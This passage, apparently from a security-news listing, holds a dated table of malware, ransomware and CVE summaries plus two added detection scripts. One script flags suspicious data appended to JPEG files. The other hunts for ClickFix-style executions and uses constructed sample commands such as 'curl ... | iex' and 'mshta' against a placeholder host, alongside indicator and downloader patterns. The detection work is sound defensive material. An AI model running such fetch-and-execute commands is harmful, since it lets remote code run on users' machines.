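            raise ValueError(f"expected a marker at offset {i}")
        marker = data[i + 1]
        if marker == 0xFF:                       # padding byte before a marker
            i += 1
            continue
        if marker == EOI:
            return data[i + 2:]
        if marker in STANDALONE:
            i += 2
            continue
        if i + 4 > len(data):
            return b""
        (seg_len,) = struct.unpack(">H", data[i + 2:i + 4])
        i += 2 + seg_len                         # length covers itself, not the marker
        if marker == SOS:
            # Entropy-coded data follows: skip until a marker that is neither a
            # stuffed 0xFF00 nor a restart marker.
            while i + 1 < len(data):
                if data[i] == 0xFF and data[i + 1] != 0x00 and data[i + 1] not in RST:
                    break
                i += 1
    return b""

INDICATORS = (b"<script", b"powershell", b"cmd.exe", b"eval(", b"frombase64string", b"#!/")

def scan_trailer(trailer: bytes) -> Dict[str, object]:
    """Cheap triage of the trailer: size, how much of it is text, PE header, script markers."""
    low = trailer.lower()
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in trailer)
    return {
        "trailing_bytes": len(trailer),
        "printable_ratio": round(printable / len(trailer), 2) if trailer else 0.0,
        "pe_header": trailer[:2] == b"MZ",
        "indicators": [ind.decode() for ind in INDICATORS if ind in low],
    }

def build_sample(trailer: bytes) -> bytes:
    """Constructed minimal JPEG marker skeleton followed by the given trailer."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\xff\x00\x34\xff\xd0\x56"       # contains a stuffed 0xFF00 and an RST0 marker
    return b"\xff\xd8" + app0 + sos + scan + b"\xff\xd9" + trailer

if __name__ == "__main__":
    sample = build_sample(b"<script>eval(atob('Zm9v'))</script>")
    trailer = jpeg_trailing_data(sample)
    print(scan_trailer(trailer))
```

Treat a non-empty trailer as a triage signal, not a verdict: some cameras and phone "motion photo" formats legitimately store data after EOI, and this check says nothing about payloads hidden inside the pixel data itself, which needs a decoder and statistical tests rather than a marker walk.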
20.3.25 |
Fake captchas entice users to run malicious commands for rootkit deployment | VIRUS | Another fake captcha campaign is resulting in rootkits being deployed to unsuspecting victims. The attack is spread via fake captchas that impersonate popular software tools and websites: the captcha copies a malicious PowerShell command, which invokes curl, to the user's clipboard and instructs the user to run it to prove they are human. | |
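The chain described above leaves a recognizable shape in process-creation telemetry: the pasted command is launched from the Run dialog (so the parent is explorer.exe), it fetches a second stage with curl or a PowerShell equivalent, and it feeds the result into an execution sink. The hunt below is an added example, not from the page; it scores constructed Sysmon-like records (Image, ParentImage, CommandLine) on those independent signals, and the weights and threshold are this example's own choices rather than a published rule.

```python
"""Hunt for ClickFix-style executions in process-creation telemetry.

Added example, not from the page. Event records are constructed in a simplified
Sysmon-like shape (Image, ParentImage, CommandLine); map your own source's field
names onto them. Scoring weights and threshold are this example's own choices.
"""
import re
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}   # Win+R / Run dialog launches come from the shell
DOWNLOADERS = re.compile(
    r"\b(curl(\.exe)?|wget|invoke-webrequest|iwr|downloadstring|invoke-restmethod|irm)\b", re.I)
EXEC_SINKS = re.compile(
    r"(\biex\b|invoke-expression|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|\bmshta\b\s+https?:)", re.I)

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(ev: Dict[str, str]) -> Tuple[int, List[str]]:
    """Return a score and the reasons; each independent signal adds one point."""
    reasons = []
    if basename(ev.get("Image", "")) in SCRIPT_HOSTS:
        reasons.append("script host")
    if basename(ev.get("ParentImage", "")) in INTERACTIVE_PARENTS:
        reasons.append("spawned by the interactive shell")
    cmd = ev.get("CommandLine", "")
    if DOWNLOADERS.search(cmd):
        reasons.append("fetches remote content")
    if EXEC_SINKS.search(cmd):
        reasons.append("executes fetched or encoded content")
    return len(reasons), reasons

def hunt(events: List[Dict[str, str]], threshold: int = 3) -> List[Tuple[Dict[str, str], List[str]]]:
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, reasons))
    return hits

SAMPLE_EVENTS = [  # constructed
    {"EventId": "1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile Get-Process"},
    {"EventId": "2", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "curl https://example.invalid/v.txt | iex"'},
    {"EventId": "3", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\agent\Runner.Worker.exe",
     "CommandLine": "cmd.exe /c curl -sSLo build.zip https://example.invalid/build.zip"},
    {"EventId": "4", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
]

if __name__ == "__main__":
    for ev, reasons in hunt(SAMPLE_EVENTS):
        print(ev["EventId"], ev["CommandLine"], "->", "; ".join(reasons))
```

Event 3 (a CI runner using curl) scores two and stays below the threshold, which is the point of scoring independent signals rather than matching on "curl" alone; tune the threshold and the parent list against your own baseline before alerting on it.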
20.3.25 |
CVE-2024-27564 - ChatGPT commit f9f4bbc SSRF vulnerability exploited in the wild | VULNERABILITY | New reports have emerged about threat actors actively exploiting an older Server-Side Request Forgery (SSRF) vulnerability (CVE-2024-27564) affecting OpenAI's ChatGPT. | |
20.3.25 |
NailaoLocker Ransomware | RANSOM | NailaoLocker is a ransomware variant distributed last year in campaigns targeting various European healthcare organizations. The attackers responsible for the attacks have been leveraging previously disclosed Check Point Security Gateway vulnerability CVE-2024-24919 in the initial attack stages. | |
20.3.25 |
AnubisBackdoor: New Python-based malware linked to Coreid APT group | ALERTS | VIRUS | A relatively new backdoor malware dubbed AnubisBackdoor has been spotted in the wild. This Python-based backdoor is attributed to the Savage Ladybug group, which is reportedly connected to the notorious Coreid (aka Fin7) APT group. |
20.3.25 |
CVE-2025-27636 - Apache Camel Message Header Injection vulnerability | VULNERABILITY | CVE-2025-27636 is a recently identified bypass/injection vulnerability affecting Apache Camel, a popular open-source integration framework. | |
20.3.25 |
StilachiRAT malware | ALERTS | VIRUS | StilachiRAT is a new remote access trojan variant discovered recently by researchers from Microsoft. The malware possesses extensive remote control as well as infostealing capabilities. |
20.3.25 |
Black Basta Ransomware | RANSOMWARE | ANALYSIS | Analysis of Black Basta Ransomware Chat Leaks |
20.3.25 |
UAC-0200: Espionage against the defense-industrial complex using DarkCrystal RAT (CERT-UA#14045) | BATTLEFIELD UKRAINE | BATTLEFIELD UKRAINE | The government computer emergency response team CERT-UA is recording repeated targeted cyberattacks against both employees of defense-industrial enterprises and individual representatives of the Defense Forces of Ukraine. |
20.3.25 |
CVE-2024-4577 | VULNERABILITY | In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in the command line given to Win32 API functions. |
20.3.25 |
PEAKLIGHT | MALWARE | DROPPER | PEAKLIGHT: Decoding the Stealthy Memory-Only Malware |
20.3.25 |
Auto Dealership Supply Chain Attack | HACKING | MALWARE | Over 100 auto dealerships were being abused compliments of a supply chain attack of a shared video service unique to dealerships. |
20.3.25 |
ClearFake | MALWARE | JAVASCRIPT | ClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery |
19.3.25 |
Protection Highlight: Thwarting Ransomware with Carbon Black Endpoint Standard | ALERTS | RANSOM | Today's ransomware is innovating at a rapid pace. Going beyond simple file encryption, ransomware increasingly leverages unknown variants and fileless techniques. |
19.3.25 |
JPHP downloader uncovered | VIRUS | A new downloader compiled with JPHP was recently observed. JPHP is an interpreter that allows PHP scripts to execute in a Java Virtual Machine. This particular malware was originally delivered in a ZIP file and leveraged Telegram for its C2 communications. Potential downloaded payloads include infostealers such as Danabot. | |
19.3.25 |
VenomRat malware campaign uses VHD files for data exfiltration | CAMPAIGN | A VenomRat malware campaign using VHD files has been observed in the wild. The attack begins with a phishing email containing an archive attachment disguised as a purchase order to lure users. Inside the archive there is a .vhd file which mounts itself as a hard disk when opened. | |
19.3.25 |
New XCSSET macOS malware variant discovered | According to recent reports, a new variant of XCSSET, the macOS modular malware, has been observed by researchers at Microsoft. First discovered in 2020, XCSSET is a sophisticated modular malware known to target users by infecting Apple Xcode projects. | ||
19.3.25 |
A new Sobolan malware campaign | ALERTS | CAMPAIGN | Threat actors use compromised interactive computing environments such as Jupyter Notebooks to spread Sobolan malware in a multi-stage attack. |
19.3.25 |
Rules File Backdoor | ATTACK | AI | New Vulnerability in GitHub Copilot and Cursor: How Hackers Can Weaponize Code Agents |
19.3.25 |
CVE-2025-20061 | VULNERABILITY | An operating system command injection vulnerability that could permit an attacker to execute arbitrary commands on the affected system via specially crafted POST requests containing an email parameter |
19.3.25 |
CVE-2025-20014 | VULNERABILITY | An operating system command injection vulnerability that could permit an attacker to execute arbitrary commands on the affected system via specially crafted POST requests containing a version parameter |
19.3.25 |
CVE-2025-30066 | VULNERABILITY | tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs. (The tags v1 through v45.0.7 were affected on 2025-03-14 and 2025-03-15 because they were modified by a threat actor to point at commit 0e58ed8, which contained malicious updateFeatures code.) |
19.3.25 |
ZDI-CAN-25373 | Zero-Day | Zero-Day | (0Day) Microsoft Windows LNK File UI Misrepresentation Remote Code Execution Vulnerability |
19.3.25 |
CVE-2024-54085 | VULNERABILITY | AMI's SPx contains a vulnerability in the BMC where an attacker may bypass authentication remotely through the Redfish Host Interface. Successful exploitation of this vulnerability may lead to a loss of confidentiality, integrity, and/or availability. |
19.3.25 |
Operation AkaiRyū | OPERATION | OPERATION | Operation AkaiRyū: MirrorFace invites Europe to Expo 2025 and revives ANEL backdoor |
19.3.25 |
BADBOX 2.0 | BOTNET | BOTNET | Satori Threat Intelligence Disruption: BADBOX 2.0 Targets Consumer Devices with Multiple Fraud Schemes |
18.3.25 |
StilachiRAT | MALWARE | RAT | StilachiRAT analysis: From system reconnaissance to cryptocurrency theft |
18.3.25 |
CVE-2025-24813 | VULNERABILITY | Path Equivalence: 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write-enabled Default Servlet in Apache Tomcat. |
17.3.25 |
CVE-2025-1316 |
VULNEREBILITY |
Edimax IC-7100 does not properly neutralize requests. An attacker can create specially crafted requests to achieve remote code execution on the device | |
17.3.25 |
CVE-2025-30066 |
VULNEREBILITY |
tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs. (The tags v1 through v45.0.7 were affected on 2025-03-14 and 2025-03-15 because they were modified by a threat actor to point at commit 0e58ed8, which contained malicious updateFeatures code.) | |
16.3.25 |
ENCRYPTED |
Decrypting Encrypted files from Akira Ransomware (Linux/ESXI variant 2024) using a bunch of GPUs |
||
16.3.25 |
VPN |
Inside BRUTED: Black Basta (RaaS) Members Used Automated Brute Forcing Framework to Target Edge Network Devices |
||
16.3.25 |
VULNEREBILITY |
A vulnerability in confederation implementation for the Border Gateway Protocol (BGP) in Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. |
||
16.3.25 |
TOOL |
THREAT ANALYSIS REPORT: Inside the LockBit Arsenal - The StealBit Exfiltration Tool |
||
16.3.25 |
RANSOMWARE |
New Ransomware Operator Exploits Fortinet Vulnerability Duo |
||
16.3.25 |
VULNEREBILITY |
An Improper Isolation or Compartmentalization vulnerability in the kernel of Juniper Networks Junos OS allows a local attacker with high privileges to compromise the integrity of the device. |
||
16.3.25 |
AI |
A new variant of the OctoV2 Android banking malware has been spread recently under the disguise of a DeepSeek AI mobile app. DeepSeek is a recently released AI-powered chatbot, much like the well-known ChatGPT. |
||
14.3.25 |
SuperBlack is a new ransomware variant based on the leaked Lockbit builder. According to recent reports, a newly observed distribution of this malware has been attributed to the threat actor dubbed Mora_001 (a possible Lockbit affiliate). |
|||
14.3.25 |
LithiumWare is a new ransomware strain observed in the wild. The malware encrypts user data and appends random four-character extensions to the locked files. |
|||
14.3.25 |
Vedalia threat group tied to new Android spyware called KoSpy |
KoSpy is a recently discovered Android spyware that has been associated with the North Korean APT Vedalia (also known as APT37 ScarCruft). The spyware was observed masquerading as numerous utility applications to entice/trick its victims. |
||
14.3.25 |
Since its identification in late 2024, the Hellcat Ransomware Group has emerged as a prominent Ransomware-as-a-Service (RaaS) threat claiming attacks on critical national infrastructure and government organizations. |
|||
14.3.25 |
An email campaign targeting organizations in the UAE associated with aviation and satellite communications has been reported. The attack leveraged a compromised email account from an Indian electronics firm to send malicious emails aimed at luring victims. |
|||
14.3.25 |
Cryptojacking |
Captain MassJacker Sparrow: Uncovering the Malware’s Buried Treasure |
||
14.3.25 |
Rootkit |
Analyzing OBSCURE#BAT: Threat Actors Lure Victims into Executing Malicious Batch Scripts to Deploy Stealthy Rootkits |
||
13.3.25 |
DocSwap is a new mobile malware variant distributed under the disguise of a "document viewing authentication" mobile app. |
|||
13.3.25 |
A new campaign distributing scam crypto investment platforms |
A new campaign spreading fraudulent cryptocurrency investment platforms has been reported by researchers from Palo Alto. The attackers leverage websites and Android mobile apps masquerading as known brands of retail stores, financial institutions or technology companies to lure their victims. |
||
13.3.25 |
CVE-2025-25181 - Advantive VeraCore SQL Injection vulnerability |
CVE-2025-25181 is a SQL Injection vulnerability affecting Advantive VeraCore, which is an order fulfillment and warehouse management software. If successfully exploited, the flaw might allow remote attackers to execute arbitrary SQL commands via the PmSess1 parameter and gain unauthorized access to sensitive data. |
||
13.3.25 |
Ballista botnet targets TP-Link Archer routers via vulnerability exploitation |
A new botnet dubbed Ballista has targeted organizations in Australia, China, Mexico, and the US focusing on healthcare, manufacturing, services, and technology sectors. |
||
13.3.25 |
Credential Theft Campaign Disguised as Construction Quote Requests |
An actor has been running a large phishing campaign, targeting businesses with emails disguised as requests for quotations. The emails, sent from multiple Outlook, Live, Hotmail, and MSN addresses, urge recipients to review an attached document, claiming it contains the scope of work for an urgent project. |
||
13.3.25 |
PlayPraetor is a mobile malware recently distributed via fake Play Store websites. Many of the observed fraudulent domains leverage typo-squatting techniques to lure the unsuspecting victims into downloading the malicious binaries. |
|||
13.3.25 |
CVE-2024-32444 and CVE-2024-32555 - WordPress RealHome and Easy Real Estate Plugin vulnerabilities |
CVE-2024-32444 and CVE-2024-32555 are two recently disclosed vulnerabilities affecting WordPress RealHome and WordPress Easy Real Estate Plugin respectively. |
||
13.3.25 |
Blind Eagle (aka APT-C-36), is a threat actor group that engages in both espionage and cyber-crime. It primarily targets organizations in Colombia and other Latin American countries focusing on government institutions, financial organizations, and critical infrastructure. |
|||
13.3.25 |
Malvertising campaign found in pirate streaming sites leading to infostealers |
A malvertising campaign has been recently disclosed by Microsoft. The malicious actors start by injecting malvertising redirectors into videos hosted on pirate streaming sites. |
||
13.3.25 |
A new wave of phishing is making the rounds in South Korea, disguising itself as an official email from the Korean National Tax Service (NTS). The email claims to contain an electronic tax invoice and includes an HTML attachment named NTS_eTaxInvoice.html. |
|||
13.3.25 |
Malicious operations attributed to the EncryptHub threat actor |
EncryptHub is a new threat actor engaging in malicious operations distributing ransomware and infostealers (StealC, Rhadamanthys) to the unsuspecting victims. |
||
13.3.25 |
A new malicious campaign targeting the maritime and nuclear energy sector across South and Southeast Asia, the Middle East, and Africa has been attributed to the Leafperforator (also known as SideWinder) APT group. |
|||
13.3.25 |
Spyware |
Lookout Discovers New Spyware by North Korean APT37 |
||
13.3.25 |
VULNEREBILITY |
Ruby SAML allows a SAML authentication bypass due to namespace handling (parser differential) |
||
13.3.25 |
VULNEREBILITY |
Ruby SAML allows a SAML authentication bypass due to DOCTYPE handling (parser differential) |
||
13.3.25 |
VULNEREBILITY |
An out of bounds write exists in FreeType versions 2.13.0 and below (newer versions of FreeType are not vulnerable) when attempting to parse font subglyph structures related to TrueType GX and variable font files. |
||
13.3.25 |
GROUP |
Ghost in the Router: China-Nexus Espionage Actor UNC3886 Targets Juniper Routers |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.5) - DotNetNuke |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 9.8) - Zimbra Collaboration Suite |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 5.3) - VMware vCenter |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.5) - VMware Workspace ONE UEM |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 9.8) - GitLab CE/EE |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 8.6) - GitLab CE/EE |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.5) - GitLab CE/EE |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 9.8) - ColumbiaSoft DocumentLocator |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.5) - BerriAI LiteLLM |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 8.2) - Ivanti Connect Secure |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.0) - A Windows Win32 Kernel Subsystem use-after-free (UAF) vulnerability that allows an authorized attacker to elevate privileges locally |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 4.6) - A Windows NTFS information disclosure vulnerability that allows an attacker with physical access to a target device and the ability to plug in a malicious USB drive to potentially read portions of heap memory |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.8) - An integer overflow vulnerability in Windows Fast FAT File System Driver that allows an unauthorized attacker to execute code locally |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 5.5) - An out-of-bounds read vulnerability in Windows NTFS that allows an authorized attacker to disclose information locally |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.8) - A heap-based buffer overflow vulnerability in Windows NTFS that allows an unauthorized attacker to execute code locally |
||
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.0) - An improper neutralization vulnerability in Microsoft Management Console that allows an unauthorized attacker to bypass a security feature locally |
||
12.3.25 |
Update |
This document lists security updates and Rapid Security Responses for Apple software. |
||
12.3.25 |
APT |
Blind Eagle: …And Justice for All |
||
11.3.25 |
A new campaign distributing Poco RAT to Spanish-speaking users in Latin America has been reported in the wild. The campaign has been attributed to the Darkling APT (aka Dark Caracal). The group is known to leverage Bandook-based backdoors in their attacks. |
|||
11.3.25 |
CVE-2024-13159 - Ivanti Endpoint Manager (EPM) Absolute Path Traversal vulnerability |
CVE-2024-13159 is a critical (CVSS score 9.8) absolute path traversal vulnerability affecting the Ivanti Endpoint Manager (EPM) software. If successfully exploited, the flaw might allow a remote unauthenticated attacker to leak sensitive information. |
||
11.3.25 |
BOTNET |
Cato CTRL™ Threat Research: Ballista – New IoT Botnet Targeting Thousands of TP-Link Archer Routers |
||
11.3.25 |
APT |
SideWinder targets the maritime and nuclear sectors with an updated toolset |
||
11.3.25 |
VULNEREBILITY |
An unrestricted file upload vulnerability in Advantive VeraCore that allows a remote unauthenticated attacker to upload files to unintended folders via upload.apsx |
||
11.3.25 |
VULNEREBILITY |
An SQL injection vulnerability in Advantive VeraCore that allows a remote attacker to execute arbitrary SQL commands |
||
11.3.25 |
VULNEREBILITY |
An absolute path traversal vulnerability in Ivanti EPM that allows a remote unauthenticated attacker to leak sensitive information |
||
11.3.25 |
VULNEREBILITY |
An absolute path traversal vulnerability in Ivanti EPM that allows a remote unauthenticated attacker to leak sensitive information |
||
11.3.25 |
VULNEREBILITY |
An absolute path traversal vulnerability in Ivanti EPM that allows a remote unauthenticated attacker to leak sensitive information |
||
11.3.25 |
VULNEREBILITY |
Moxa’s Ethernet switch is vulnerable to an authentication bypass because of flaws in its authorization mechanism. Although both client-side and back-end server verification are involved in the process, attackers can exploit weaknesses in its implementation. |
||
10.3.25 |
Strela Stealer is a malware infostealer typically distributed through phishing campaigns affecting users in Italy, Germany, Spain, and Ukraine. It is designed to target specific email clients (notably Microsoft Outlook and Mozilla Thunderbird) and exfiltrate email login credentials. |
|||
10.3.25 |
Boramae is a new ransomware discovered just recently in the threat landscape and a suspected variant of the Beast aka BlackLockbit malware family. The malware encrypts user files and appends ".boramae" to them. |
|||
10.3.25 |
Phantom-Goblin is the name of a malicious infostealing campaign recently identified in the wild. The attackers responsible are leveraging social engineering techniques to lure victims into executing malicious .LNK files. |
|||
10.3.25 |
Desert Dexter is a recently reported malicious operation targeting users based in the Middle East and North Africa. The responsible threat actors are distributing malicious binaries hosted on legitimate file-sharing portals or via seemingly harmless Telegram channels. |
|||
10.3.25 |
HACKING |
Polymorphic Extensions: The Sneaky Extension That Can Impersonate Any Browser Extension |
||
10.3.25 |
Malware |
Desert Dexter. Attacks on Middle Eastern countries |
||
10.3.25 |
CRYPTOCURRENCY |
Undercover miner: how YouTubers get pressed into distributing SilentCryptoMiner as a restriction bypass tool |
||
9.3.25 |
VULNEREBILITY |
Espressif ESP32 chips allow 29 hidden HCI commands, such as 0xFC02 (Write memory). |
||
9.3.25 |
VULNEREBILITY |
Edimax IC-7100 does not properly neutralize requests. An attacker can create specially crafted requests to achieve remote code execution on the device |
||
8.3.25 |
Android |
Satori Threat Intelligence Disruption: BADBOX 2.0 Targets Consumer Devices with Multiple Fraud Schemes |
||
8.3.25 |
PHISHING |
We’re aware that phishers have been sharing private videos to send false videos, including an AI generated video of YouTube’s CEO Neal Mohan announcing changes in monetization. |
||
8.3.25 |
Ransom |
Snail Mail Fail: Fake Ransom Note Campaign Preys on Fear |
||
8.3.25 |
Loader |
Inside Zloader’s Latest Trick: DNS Tunneling |
||
8.3.25 |
Stealer |
TMPN (Skuld) Stealer: The dark side of open source |
||
8.3.25 |
AI |
Trojans disguised as AI: Cybercriminals exploit DeepSeek’s popularity |
||
8.3.25 |
GROUP |
(EncryptHub) is a threat actor that has come to the forefront with highly sophisticated spear-phishing attacks since 26 June 2024. In the attacks it has carried out, it exhibits a different operational strategy by carrying out all the processes necessary to obtain initial access through personalized SMS (smishing) or by calling the person directly (vishing) and tricking the victim into installing remote monitoring and management (RMM) software. |
||
8.3.25 |
Loader |
(a.k.a Sardonic Backdoor) is a sophisticated toolkit of the Monstrous Mantis |
||
7.3.25 |
Desert Dexter is a recently reported malicious operation targeting users based in the Middle East and North Africa. The responsible threat actors are distributing malicious binaries hosted on legitimate file-sharing portals or via seemingly harmless Telegram channels. |
|||
7.3.25 |
Latest Njrat variant uses Microsoft Dev Tunnels for C2 communications |
A new variant of the NjRAT malware has been reported in the wild. NjRAT (also known as Bladabindi or Ratenjay) is an older but still widely used Remote Access Trojan (RAT). This malware is often used to extract data from the compromised endpoints, send commands via remote shell, manipulate the registry as well as download additional payloads. |
||
7.3.25 |
Medusa ransomware attacks jumped by 42% between 2023 and 2024. This increase in activity continues to escalate, with almost twice as many Medusa attacks observed in January and February 2025 as in the first two months of 2024. |
|||
7.3.25 |
A new campaign targeting ISP infrastructure with infostealers |
A new campaign targeting ISP (Internet service providers) infrastructure with infostealers and cryptocurrency miners has been reported in the wild. In the initial attack stages the threat actors are leveraging brute force attacks to access the vulnerable environments. |
||
7.3.25 |
Kit |
Unmasking the new persistent attacks on Japan |
||
7.3.25 |
VULNEREBILITY |
In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions |
||
7.3.25 |
RANSOMWARE |
The threat actors behind the Medusa ransomware have claimed nearly 400 victims since it first emerged in January 2023, with the financially motivated attacks witnessing a 42% increase between 2023 and 2024. |
||
7.3.25 |
VULNEREBILITY |
Prototype pollution in Kibana leads to arbitrary code execution via a crafted file upload and specifically crafted HTTP requests. In Kibana versions >= 8.15.0 and < 8.17.1, this is exploitable by users with the Viewer role |
||
7.3.25 |
RAT |
Unveiling EncryptHub: Analysis of a multi-stage malware campaign |
||
7.3.25 |
JavaScript |
Thousands of websites hit by four backdoors in 3rd party JavaScript attack |
||
6.3.25 |
APT |
Silk Typhoon targeting IT supply chain |
||
6.3.25 |
RAT |
The evolution of Dark Caracal tools: analysis of a campaign featuring Poco RAT |
||
6.3.25 |
APT |
The evolution of Dark Caracal tools: analysis of a campaign featuring Poco RAT |
||
6.3.25 |
APT |
Lotus Blossom espionage group targets multiple industries with different versions of Sagerunex and hacking tools |
||
5.3.25 |
In a new report, researchers at Fortinet have detailed a phishing campaign that was used to deliver Havoc malware. Havoc is a malicious framework, akin to Cobalt Strike, that is actively leveraged to compromise victims. |
|||
5.3.25 |
Danger & Loches - recent Globeimposter ransomware variants seen in the wild |
Danger and Loches are the two most recently identified variants of the Globeimposter ransomware family. The malware will encrypt user data and append the .danger or .loches extension to the locked files respectively. |
||
5.3.25 |
GrassCall malware campaign spreads infostealers to job seekers |
GrassCall is a recently identified campaign attributed to the threat group known as Crazy Evil. The attack has been targeting job seekers with fake job interviews in efforts to distribute malicious executables used for infostealing. |
||
5.3.25 |
CVE-2024-12356 is a critical (CVSS score 9.8) command injection vulnerability affecting the BeyondTrust Privileged Remote Access (PRA) and BeyondTrust Remote Support (RS) software. If successfully exploited, the flaw might allow an unauthenticated attacker to inject commands that are run as a site user. |
|||
5.3.25 |
Leveraging malicious LNK files and Null-AMSI tool to deliver AsyncRAT |
A malware campaign using malicious LNK files disguised as wallpapers to lure users has been observed. As part of the attack vector, the open-source Null-AMSI tool is employed to bypass malware scanning interfaces (AMSI) and Event Tracing for Windows (ETW). |
||
5.3.25 |
The Winos4.0 malware framework has been used by threat groups to perpetrate attacks against intended victims. In a recent report from Fortinet, they have outlined an attack observed against users in Taiwan, using a tax related lure to distribute Winos4.0 malware. |
|||
5.3.25 |
Fake browser updates being distributed through malicious redirects |
Security researchers have observed recent malware campaigns utilizing web-based malware distribution via compromised sites rather than relying solely on email-based attacks to spread malicious links. |
||
5.3.25 |
Go |
Typosquatted Go Packages Deliver Malware Loader Targeting Linux and macOS Systems |
||
5.3.25 |
RANSOMWARE |
Black Basta and Cactus Ransomware Groups Add BackConnect Malware to Their Arsenal |
||
5.3.25 |
Stealer |
Qbot is Back.Connect |
||
5.3.25 |
VULNEREBILITY |
(CVSS score: 9.3) - A Time-of-Check Time-of-Use (TOCTOU) vulnerability that leads to an out-of-bounds write, which a malicious actor with local administrative privileges on a virtual machine could exploit to execute code as the virtual machine's VMX process running on the host |
||
5.3.25 |
VULNEREBILITY |
(CVSS score: 8.2) - An arbitrary write vulnerability that a malicious actor with privileges within the VMX process could exploit to result in a sandbox escape |
||
5.3.25 |
VULNEREBILITY |
(CVSS score: 7.1) - An information disclosure vulnerability due to an out-of-bounds read in HGFS that a malicious actor with administrative privileges to a virtual machine could exploit to leak memory from the vmx process |
||
5.3.25 |
Go |
Call It What You Want: Threat Actor Delivers Highly Targeted Multistage Polyglot Malware |
||
5.3.25 |
Infostealer |
Infostealer Campaign against ISPs |
||
4.3.25 |
VULNEREBILITY |
(CVSS score: 6.5) - A command injection vulnerability in the web-based management interface of Cisco Small Business RV Series routers that allows an authenticated, remote attacker to gain root-level privileges and access unauthorized data (Unpatched due to the routers reaching end-of-life status) |
||
4.3.25 |
VULNEREBILITY |
(CVSS score: 8.6) - An authorization bypass vulnerability in Hitachi Vantara Pentaho BA Server that stems from the use of non-canonical URL paths for authorization decisions (Fixed in August 2024 with versions 9.3.0.2 and 9.4.0.1) |
||
4.3.25 |
VULNEREBILITY |
(CVSS score: 7.8) - An improper resource shutdown or release vulnerability in Microsoft Windows Win32k that allows for local, authenticated privilege escalation, and running arbitrary code in kernel mode (Fixed in December 2018) |
||
4.3.25 |
VULNEREBILITY |
(CVSS score: 7.8) - An improper resource shutdown or release vulnerability in Microsoft Windows Win32k that allows for local, authenticated privilege escalation, and running arbitrary code in kernel mode (Fixed in December 2018) |
||
4.3.25 |
VULNEREBILITY |
(CVSS score: 9.8) - A path traversal vulnerability in Progress WhatsUp Gold that allows an unauthenticated attacker to achieve remote code execution (Fixed in version 2023.1.3 in June 2024) |
||
4.3.25 |
VULNEREBILITY |
A privilege escalation flaw in the Framework component that could result in unauthorized access to "Android/data," "Android/obb," and "Android/sandbox" directories, and their respective sub-directories. |
||
4.3.25 |
VULNEREBILITY |
A privilege escalation flaw in the HID USB component of the Linux kernel that could lead to a leak of uninitialized kernel memory to a local attacker through specially crafted HID reports. |
||
4.3.25 |
GROUP |
JavaGhost’s Persistent Phishing Attacks From the Cloud |
||
4.3.25 |
Loader |
Havoc: SharePoint with Microsoft Graph API turns into FUD C2 |
||
4.3.25 |
VULNEREBILITY |
An arbitrary kernel memory mapping vulnerability in version 7.9.1 caused by a failure to validate user-supplied data lengths. Attackers can exploit this flaw to escalate privileges. |
||
4.3.25 |
VULNEREBILITY |
An arbitrary kernel memory write vulnerability in version 7.9.1 due to improper validation of user-supplied data lengths. |
||
4.3.25 |
VULNEREBILITY |
A null pointer dereference vulnerability in version 7.9.1 caused by the absence of a valid MasterLrp structure in the input buffer. |
||
4.3.25 |
VULNEREBILITY |
An arbitrary kernel memory vulnerability in version 7.9.1 caused by the memmove function, which fails to sanitize user-controlled input. |
||
4.3.25 |
VULNEREBILITY |
An insecure kernel resource access vulnerability in version 17 caused by failure to validate the MappedSystemVa pointer before passing it to HalReturnToFirmware. |
||
4.3.25 |
ALERT |
Paragon Partition Manager's BioNTdrv.sys driver, versions prior to 2.0.0, contains five vulnerabilities. |
||
3.3.25 |
BOTNET |
Long Live The Vo1d Botnet: New Variant Hits 1.6 Million TV Globally |
||
1.3.25 |
